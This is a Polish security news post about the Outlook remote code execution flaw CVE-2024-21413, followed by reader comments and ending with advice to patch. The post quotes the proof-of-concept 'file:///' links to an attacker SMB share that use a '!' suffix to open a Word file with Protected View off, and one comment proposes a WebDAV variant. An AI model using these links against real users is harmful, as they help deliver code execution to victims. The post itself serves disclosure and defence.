Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Krytyczna podatność klasy RCE (Remote Code Execution) w Outlooku. CVE-2024-21413.
Czytając ten opis od Microsoftu, można całkiem mocno się zestresować. Co my tutaj mamy?
- RCE bez uwierzytelnienia w Outlooku
- Niemal maksymalna krytyczność (9.8 w skali CVSS)
- Eksploitacja nie wymaga interakcji ze strony ofiary
Podatność jest exploitowana w realnych atakachAktualizacja: Microsoft zmienił podaną wcześniej przez siebie informację. Wg obecnego statusu podatność najpewniej nie jest exploitowana.
Czy wystarczy więc wysłanie do kogoś odpowiednio spreparowanego maila i Game Over? Wygląda na to, że nie jest aż tak źle. Nie jest też różowo. Nieco więcej szczegółów dostarcza świeże badanie od firmy Checkpoint. Czytamy tutaj, że umieszczenie takiego linku w mailu:
<a href=”file:///\\10.10.111.111\test\test.rtf”>CLICK ME</a>
powodowało, że jego kliknięcie przez użytkownika-ofiarę… nic nie dawało. Ale już zaopatrzenie linku w wykrzyknik oraz losowe znaki otwierało dokument MS Word (rtf):
<a href=”file:///\\10.10.111.111\test\test.rtf!something”>CLICK ME</a>
Co więcej, tak skonstruowany link otworzy plik Worda z wyłączonym Protected View.
Podsumowując, wygląda na to, że exploit wygląda tak:
- Atakujący przesyła e-maila z linkiem do kliknięcia przez ofiarę
- Ofiara klika linka
- W tle otwiera się plik Worda dostarczony przez atakującego
- Plik Worda zawiera (osobnego) exploita dającego wykonanie kodu na komputerze ofiary
Ale nie prościej wysłać po prostu zainfekowany załącznik Worda, licząc że ofiara go otworzy? Niekoniecznie – jednak kliknięcie w link jest prostsze niż otworzenie załącznika. Co więcej w przypadku załącznika, atakujący musiałby dodatkowo ominąć mechanizm Protected View (np. poprzez skłonienie ofiary do dodatkowego kliku).
Aktualizujcie się.
~ms
Jest info ze strony Ms, które wersje Office są podatne ?
Zobacz tutaj: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413
Zakładałbym, że wszystkie wypuszczone przed wersją z fixem (Build 17231.20236)
Release notes:
https://learn.microsoft.com/en-us/officeupdates/microsoft365-apps-security-updates
Według danych podanych na jednej ze stron MS:
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2016 (32-bit edition)
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft Office 2019 for 64-bit editions
Microsoft Office 2019 for 32-bit editions
its not a bug if its an intended feature
Pytanie,
Czy dotyczy to ominięcia Protected View tylko wyłącznie po SMB?
Czy dopisanie na końcu „!” po http/https tez spowoduje uruchomienie bez Protected View?
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413
No to jak jest wreszcie?
Eksploitacja nie wymaga interakcji ze strony ofiary.
Ale w link trzeba kliknąć…
To w końcu nie wymaga interakcji czy trzeba kliknąć w link?
Najpewniej trzeba kliknąć link, chociaż Microsoft twierdzi że nie…
A dopiero co tydzień temu wyłączyłem aktualizacje, bo w Outlook do paska wyszukiwania dostał się jakiś błąd i nie można było nic wyszukiwać. Znalazłem jak to naprawić i oczywiście Microsoft zalecił wyłączenie aktualizacji haha :D
Wysoka krytyczność bo znajomy zaraportował chyba.
Ja jestem bardziej krytyczna xD
Więcej pytań niż odpowiedzi.
Przecież guest access po SMB jest domyślnie wyłączony w windowsach? Atakujący musiałby wcześniej znać nasze hasło żeby zestawić połączenie które klient zaakceptuje (lub łamać hash NTLM w locie, co może nie jest tak całkiem niemożliwe?).
Czy użyta funkcja fallbackuje do WebDAV, albo da się wymusić WebDav robiąc file:///\\10.10.111.111@8888\test\test.rtf!something ?
Interesują mnie takie tematy, szkoda że nie mam z kim pogadać.
To jest local code execution w zasadzie prawda chyba że umieścimy swój dla gdzieś u goscia appdata albo wykorzystamy coś z smb ? Bo nie chcę mi się drążyć
Eh ten dzisiejszy marketing :/